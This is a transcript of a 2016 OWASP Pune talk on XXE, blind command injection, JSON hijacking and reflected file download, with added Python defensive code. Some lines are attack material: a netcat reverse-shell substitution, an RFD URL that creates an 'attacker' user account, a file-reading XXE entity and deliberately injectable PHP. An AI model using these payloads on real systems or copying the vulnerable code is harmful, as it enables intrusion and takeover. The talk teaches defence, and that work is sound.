
OWASP Pune Chapter : Dive Into The Profound Web Attacks


OWASP Pune Chapter 18th Feb 2016
At - Avaya India, Pune.


  1. Dive Into The Profound Web Attacks. Narendra Bhati, Security Analyst (narendra.bhati@outlook.com). OWASP Pune Chapter, 18th Feb 2016.
  2. Who Am I - r00tsh3ll. Speaker: Narendra Bhati, Security Analyst @ Suma Soft Pvt. Ltd., Pune. Researcher and part-time bug bounty hunter. Listed in the Hall of Fame for reporting security vulnerabilities to Facebook, Google, Mozilla, Twitter etc. Holds more than 12 CVEs and 3 zero-day vulnerabilities. Blog: http://websecgeeks.com
  3. If you have any questions or queries regarding the talk, kindly note them down so we can discuss them at the end.
  4. Dive Into The Profound Web Attacks:
     • XXE (XML External Entity Injection)
     • Blind RCE (Blind Remote/OS Command Execution)
     • JSON Response Hijacking
     • Reflected File Download
  5. XXE (XML External Entity Injection)
  6. XXE (XML External Entity Injection). According to OWASP: an XML External Entity attack is a type of injection attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data.
  7. XXE (XML External Entity Injection). Why does XXE take place? Failure to validate external XML entities, which gives an attacker access to internal resources/data.
  8. XXE (XML External Entity Injection). Let's have a demo!
  9. XXE (XML External Entity Injection). Demo: getting a connection from the target domain. Accessing internal directories. By brute forcing (or otherwise) we found a directory on localhost called "/betatesting/testing.php", which is a network utility. Invalid directory: the response contains "failed to load external entity". Valid directory: the response has no "failed to load external entity" error, or there is some other difference between the responses for valid and invalid directories.
  10. XXE (XML External Entity Injection). I am leaving out the rest of the process. As per the "testing.php" response, we added a GET parameter called "ping" and, as you can see, we were able to execute commands. This is a scenario where the target system has some beta testing application which is under development or similar. You should figure out what you can do with XXE or any other vulnerability.
  11. XXE (XML External Entity Injection). Fixing the XXE: disable external entity loading in the XML parser in order to prevent XXE. For PHP: bool libxml_disable_entity_loader ([ bool $disable = true ] ). For .Net: settings.XmlResolver = null; Look for the equivalent setting in other languages as well.
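  The slide gives the PHP and .NET settings only. The following is an added Python example (not code from the talk) of the same defensive idea: the document is refused before any parser gets a chance to resolve an entity. Rather than toggling a parser flag, it rejects every DOCTYPE declaration, which is the only place entities can be declared, and then parses with the standard library. The helper names, the exception type and both sample documents are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# A DOCTYPE declaration is the only place an XML document can declare
# entities. Refusing it outright means no ENTITY (external or internal) can
# ever be defined, which is the strictest form of "disable entity loading".
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class UnsafeXMLError(ValueError):
    """Raised for client XML that carries a DTD (hypothetical exception type)."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse client-supplied XML without giving the parser any entity to resolve.

    Hypothetical helper, not from the slides. It plays the role that
    libxml_disable_entity_loader() plays in PHP and XmlResolver = null in .NET:
    the document is refused before the parser ever sees an external reference.
    """
    if _DOCTYPE_RE.search(data):
        raise UnsafeXMLError("DTD/DOCTYPE declarations are not accepted")
    # No DTD means there is nothing left for the parser to expand or fetch.
    return ET.fromstring(data)


def extract_field(data: bytes, tag: str):
    """Return the text of the first <tag> child, or None if the document was rejected."""
    try:
        root = parse_untrusted_xml(data)
    except UnsafeXMLError:
        return None
    elem = root.find(tag)
    return elem.text if elem is not None else None


# Constructed sample documents (not from the talk).
BENIGN_DOC = b"<?xml version='1.0'?><order><item>widget</item></order>"

# Constructed XXE-style document: an external entity pointing at a local file,
# which a weakly configured parser would fetch and inline into <item>.
XXE_DOC = (
    b"<?xml version='1.0'?>"
    b"<!DOCTYPE order [<!ENTITY ext SYSTEM 'file:///etc/hostname'>]>"
    b"<order><item>&ext;</item></order>"
)

if __name__ == "__main__":
    print(extract_field(BENIGN_DOC, "item"))  # widget
    print(extract_field(XXE_DOC, "item"))     # None: refused before parsing
```

  Rejecting the DTD also shuts out internal-entity expansion attacks, which a plain "no external entities" flag does not. If the application uses lxml instead of the standard library, the parser has its own resolve_entities option that must be set to False as well; one setting per parser library, as the slide says.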
  14. Blind RCE (Blind Remote/OS Command Execution)
  15. Blind RCE (Blind Remote/OS Command Execution). According to its nature/behaviour: similar to, or the elder brother of, the Blind SQL Injection vulnerability. According to OWASP: command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
  16. Blind RCE (Blind Remote/OS Command Execution). Why does RCE take place? Missing or insufficient sanitization of user input, which is appended to a system shell command when it is executed.
  17. Blind RCE (Blind Remote/OS Command Execution). Example vulnerable code in PHP (the injection point is the unsanitized filename parameter):
      <?php
      print("Please specify the name of the file to delete");
      print("<p>");
      $file = $_GET['filename'];   // injection point: untrusted input from the query string
      system("rm $file");          // interpolated straight into a shell command line
      ?>
  18. Blind RCE (Blind Remote/OS Command Execution). Some basics about chaining two commands:
      • A; B = run A and then B, regardless of whether A succeeded
      • A || B = run B only if A failed
      • A && B = run B only if A succeeded; if A failed, B will not execute
      • A & B = run A in the background and run B at the same time; if A fails, B still executes
      • A | B = run A and pass the output of A to B as input
      • A %0a B = URL-encoded newline as the separator (useful for web apps)
      • $(nc -nv ip port -e /bin/bash) = command substitution
  19. Blind RCE (Blind Remote/OS Command Execution). Demo time: Normal RCE | Some bypasses | Blind RCE [Low-Medium]
  20. Blind RCE (Blind Remote/OS Command Execution). Detection based on time-delayed responses: the response comes in approx. 4 sec; the response comes in approx. 11 sec.
  21. Blind RCE (Blind Remote/OS Command Execution). In the demonstration, we assume that the target server is configured in such a way that it will not send a reverse connection using the netcat -e option, and we cannot use wget either. The response from the command "id" gets logged in our Python simple HTTP server. Let's see whether we are able to access the /var/tmp folder. Yes we are, because in the Python server we got the response as /var/tmp. Using a similar approach, we can interact with the shell output. Remember we are not using the netcat -e option for the response; we are just piping the output to another machine.
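  Turned around to the defender's side, the operator list on slide 18 is also a detection signature: a request parameter that is supposed to hold a filename has no business containing ";", "||", "&&", "|", a newline or "$(". The following is an added Python example (not from the talk) that percent-decodes each query value in access-log lines and flags the ones carrying a chaining operator. The log format, the /delete.php path and every log line are constructed for the example; the page's PHP snippet names no script path.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Chaining operators from the talk's list (A; B, A || B, A && B, A & B,
# A | B, A %0a B, $(...)), plus the backtick form of command substitution.
# Values are matched AFTER percent-decoding, so %0a is seen as a newline
# and %3B as a semicolon. Order matters: the two-character forms are listed
# before their single-character relatives so each value gets one label.
OPERATORS = [
    (re.compile(r";"), "semicolon chain"),
    (re.compile(r"\|\|"), "or-chain"),
    (re.compile(r"&&"), "and-chain"),
    (re.compile(r"\|"), "pipe"),
    (re.compile(r"&"), "background"),
    (re.compile(r"\n"), "newline"),
    (re.compile(r"\$\("), "subshell"),
    (re.compile(r"`"), "backtick"),
]

# Combined-log style request line (constructed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def suspicious_values(target: str):
    """Return (param, decoded_value, label) for each query value holding an operator.

    A raw '&' in the query is the parameter separator and never reaches a
    value, so only the encoded form (%26) can end up inside one; that is
    exactly what the server-side shell would have received as well.
    """
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for pattern, label in OPERATORS:
            if pattern.search(value):
                findings.append((name, value, label))
                break
    return findings


def scan_log(lines):
    """Run the operator check over access-log lines; return one alert per hit."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for name, value, label in suspicious_values(m["target"]):
            alerts.append({"ip": m["ip"], "time": m["ts"], "param": name,
                           "value": value, "label": label})
    return alerts


# Constructed log lines modelled on the slide's system("rm $file") handler,
# here given the made-up path /delete.php.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Feb/2016:10:00:01 +0530] "GET /delete.php?filename=report.txt HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Feb/2016:10:00:07 +0530] "GET /delete.php?filename=report.txt%3Bid HTTP/1.1" 200 640',
    '10.0.0.9 - - [18/Feb/2016:10:00:09 +0530] "GET /delete.php?filename=x%0aid HTTP/1.1" 200 640',
    '10.0.0.9 - - [18/Feb/2016:10:00:15 +0530] "GET /delete.php?filename=x%7C%7Cid HTTP/1.1" 500 0',
    '10.0.0.7 - - [18/Feb/2016:10:00:20 +0530] "GET /search.php?q=cats+and+dogs HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

  On the constructed sample this yields three alerts, all from the same source address, which is the pattern slide 20 describes from the other side: a probing client sends several variants of one parameter in quick succession. Response time is not in the access log above; where it is logged, a jump such as the 4 to 11 seconds on slide 20 for the same URL path is a second signal worth correlating with these hits.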
  22. Blind RCE (Blind Remote/OS Command Execution). Fixing the command execution:
      • The developer should scrub all input for malicious characters.
      • It is much easier to define the legal characters than the illegal characters.
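  The following is an added Python counterpart to the PHP snippet on slide 17, not code from the talk. It applies the slide's two points: the filename is checked against an explicit allow list of legal characters, and the command is built as an argument vector rather than a string, so no shell ever interprets the value even if the check were bypassed. The upload directory, function names and sample inputs are constructed for the example.

```python
import re
import subprocess

# Allow list for a plain filename, following the slide's advice to define the
# legal characters instead of chasing the illegal ones: a letter or digit,
# then up to 63 letters, digits, dots, underscores or hyphens. Path
# separators, "..", spaces and every shell metacharacter (; | & $ ` newline)
# are rejected simply by not being on the list.
FILENAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

# Constructed fixed directory; the client never influences it.
UPLOAD_DIR = "/srv/app/uploads"


def validate_filename(name: str) -> bool:
    """True only for names made entirely of allow-listed characters.

    fullmatch (not match/search) so a trailing newline cannot slip past.
    """
    return FILENAME_RE.fullmatch(name) is not None


def build_delete_command(name: str):
    """Return the argv list for 'rm' on a validated upload, or None if rejected.

    The command is an argument vector, never a formatted string, so there is
    no shell to interpret separators even if the validation were bypassed.
    """
    if not validate_filename(name):
        return None
    return ["rm", "--", f"{UPLOAD_DIR}/{name}"]


def delete_upload(name: str, run=subprocess.run) -> bool:
    """Hardened counterpart of the slide's system("rm $file").

    `run` is injectable so the function can be exercised without touching
    the filesystem. Idiomatic Python would simply call os.remove() on the
    path; the subprocess form is kept because the slide's code shells out.
    """
    argv = build_delete_command(name)
    if argv is None:
        return False
    result = run(argv, shell=False, check=False, capture_output=True)
    return result.returncode == 0


if __name__ == "__main__":
    for candidate in ["report.txt", "report.txt;id", "x\nid", "../etc/passwd"]:
        print(repr(candidate), "->", build_delete_command(candidate))
```

  Note what the allow list buys over a deny list: the newline, backtick and "$(" forms from slide 18 never have to be enumerated, and a character the author did not think of is rejected by default rather than accepted by default.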
  23. JSON Response Hijacking
  24. JSON Response Hijacking. According to sources: similar to CSRF, this vulnerability is basically based on a browser bug which allows an attacker to steal a sensitive JSON response from the victim's authenticated session, or there could be more interesting things.
  25. JSON Response Hijacking. JSON hijacking happens if the application:
      • returns sensitive data,
      • returns a JSON array (content type JSON),
      • responds to GET requests, and
      • the browser making the request has JavaScript enabled (and supports the __defineSetter__ method).
      Source: http://haacked.com/archive/2009/06/25/json-hijacking.aspx/
  26. JSON Response Hijacking. Let's dive into the demo.
  27. JSON Response Hijacking. Fixing JSON hijacking:
      • Only return JSON objects to POST requests.
      • Prevent the web browser from interpreting the JSON object as valid JavaScript code.
      • Implement CSRF protection with random tokens for all JSON requests.
      Source: http://haacked.com/archive/2009/06/25/json-hijacking.aspx/
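  The three fixes on slide 27 fit in one response builder. The following is an added Python example (not from the talk or the cited source): a sensitive endpoint that answers only POST, requires the per-session CSRF token, never returns a bare array, and prefixes the body so it is not a valid JavaScript program. The session store, the prefix choice, the helper names and the contact list are constructed for the example.

```python
import hmac
import json
import secrets

# Constructed session store: session id -> CSRF token issued to that session.
# A real application keeps this server-side, tied to the login session.
SESSIONS = {"sess-1": secrets.token_hex(16)}

# Non-executable prefix: with it in front, the body is a syntax error as a
# JavaScript program, so a <script src=...> inclusion never reaches the array
# literal that the __defineSetter__ trick on slide 25 relies on observing.
PREFIX = ")]}',\n"


def csrf_token_valid(session_id: str, token) -> bool:
    """Constant-time comparison against the token issued to this session."""
    expected = SESSIONS.get(session_id)
    if expected is None or token is None:
        return False
    return hmac.compare_digest(expected, token)


def json_response(method: str, session_id: str, csrf_token, payload):
    """Build (status, headers, body) for a sensitive JSON endpoint.

    Hypothetical helper implementing the slide's three fixes: POST only,
    never a bare array (a list is wrapped in an object), and a per-session
    CSRF token checked on every request.
    """
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Cache-Control": "no-store",
    }
    if method != "POST":
        return 405, headers, json.dumps({"error": "POST required"})
    if not csrf_token_valid(session_id, csrf_token):
        return 403, headers, json.dumps({"error": "missing or invalid CSRF token"})
    body = payload if isinstance(payload, dict) else {"d": payload}
    return 200, headers, PREFIX + json.dumps(body)


def parse_protected_body(body: str):
    """Client side: an XHR reads the raw text and strips the prefix before parsing."""
    if not body.startswith(PREFIX):
        raise ValueError("unexpected response framing")
    return json.loads(body[len(PREFIX):])


# Constructed sensitive payload: the kind of array slide 25 warns about.
CONTACTS = [{"name": "alice", "email": "alice@example.invalid"}]

if __name__ == "__main__":
    status, _, body = json_response("POST", "sess-1", SESSIONS["sess-1"], CONTACTS)
    print(status, parse_protected_body(body))
```

  Each of the three controls stands on its own: the POST requirement and the CSRF token stop the cross-site request from being honoured at all, and the object wrapper plus prefix make the body useless as a script even if a GET variant of the endpoint is added later by mistake.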
  28. Reflected File Download
  29. Reflected File Download. According to sources: RFD is a web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from a trusted domain. Recently found in Facebook, Google etc. by researchers. Source: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
  30. Reflected File Download. Let's separate those words. Reflected: the value given in the URL should be reflected in the response. Filename: the file name handling should be permissive (allowing, or characterized by, great or excessive freedom of behaviour), i.e. the application should also accept additional user-controlled values and file types; for example, the application can accept a filename between the first slash "/" and the "?" character. Ex. code (PHP) (will not work).
  31. Reflected File Download. Let's separate those words. Download: https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycommand and "malicious.bat/,exe". So basically this is browser behaviour, i.e. how the browser handles the download process. The mentioned behaviour is for Chrome; expect other browsers to behave differently for the same URL.
  32. Reflected File Download. Attack scenario: 1. The attacker sends the victim a malicious URL on a trusted domain. Ex. http://anytrustedsite.com/apitest/search;setup.bat?term=f00bar&callback=net user attacker attacker 2. The victim finds that the domain is trusted, so he accesses the URL. 3. After clicking on the URL, the file is downloaded and, after that file is executed, something interesting happens. ;)
  33. Reflected File Download. Let's see a demo.
  34. Reflected File Download. As you can see we have a web application. The value of the download parameter is returned in the response without a filename header, and the response is downloadable.
  35. Reflected File Download. Now we are going to enter a file name in the URL. Because the response header doesn't carry a filename, there is a chance that we can control the file name from the URL itself.
  36. Reflected File Download. Now we can craft a payload as input which will execute some system command on the victim's machine. As per the reflection, we can separate out the rest of the value to perform a command execution.
  37. Reflected File Download. After executing that file we have calc execution.
  38. Reflected File Download. Create some interesting payload. Before doing that, let's check the user accounts.
  39. Reflected File Download. After executing the downloaded file, we have another user account called "attacker".
  40. Reflected File Download. Fixing the Reflected File Download: add Content-Disposition: attachment; filename=anyfile.pdf/txt. Don't allow the application to take permissive input. Limit the callback function for the ";:/" characters.
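  The following is an added Python example (not from the talk) of a search endpoint hardened along the three lines of slide 40. It matches the request path exactly, so the ";setup.bat" variant from slide 32 is a 404 rather than the same resource; it pins the download name in a Content-Disposition header instead of letting the URL decide it; and it restricts the callback parameter to an identifier allow list, which is stricter than blocking ";:/" alone. The handler name, the fixed download name and the test URLs are constructed; the /apitest/search path is taken from the slide's example URL.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Exact path of the API (from the slide's example URL). The RFD scenario
# relies on the server treating "/apitest/search;setup.bat" as this resource.
API_PATH = "/apitest/search"

# Server-chosen download name with a non-executable extension; the client
# never influences it. (Constructed value.)
DOWNLOAD_NAME = "search.json"

# Allow list for a JSONP callback: a JavaScript identifier, nothing else.
# Slide 40 says to block ";:/"; an identifier allow list gets there and also
# excludes spaces, quotes and every other character a shell would care about.
CALLBACK_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")


def handle_search(url: str):
    """Return (status, headers, body) for a request URL (hypothetical handler)."""
    parts = urlsplit(url)
    # urlsplit keeps ";setup.bat" inside .path, so an exact comparison refuses
    # the permissive-filename variant the attack depends on.
    if parts.path != API_PATH:
        return 404, {}, ""

    params = parse_qs(parts.query)
    term = params.get("term", [""])[0]
    callback = params.get("callback", [None])[0]
    if callback is not None and CALLBACK_RE.fullmatch(callback) is None:
        return 400, {"Content-Type": "application/json; charset=utf-8"}, json.dumps(
            {"error": "invalid callback"}
        )

    # The search term is still reflected, but only inside a JSON string.
    body = json.dumps({"term": term, "results": []})
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        # Fixed filename, as slide 40 prescribes: whatever the URL looked
        # like, a saved copy of this response is called search.json.
        "Content-Disposition": f'attachment; filename="{DOWNLOAD_NAME}"',
        "X-Content-Type-Options": "nosniff",
    }
    if callback:
        body = f"/**/{callback}({body});"
        headers["Content-Type"] = "application/javascript; charset=utf-8"
    return 200, headers, body


if __name__ == "__main__":
    for url in [
        "http://anytrustedsite.com/apitest/search;setup.bat?term=f00bar&callback=cb",
        "http://anytrustedsite.com/apitest/search?term=f00bar&callback=bad%3Bcallback",
        "http://anytrustedsite.com/apitest/search?term=f00bar&callback=cb1",
    ]:
        print(url, "->", handle_search(url)[0])
```

  The order of the checks matters: the path comparison comes first so that a request with a bogus path segment never reaches the parameter handling, and the callback check comes before any output is assembled so an invalid value is never echoed.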
  41. Any questions? (image; source: http://www.gapingvoidart.com/gallery/images/142061/any-questions.gif?sw,605,476,0,0,100,16777215,368040352)
  42. Thanks for listening peacefully. Kindly send me your feedback regarding the talk to narendra.bhati@outlook.com; it will help me to improve the presentation next time.
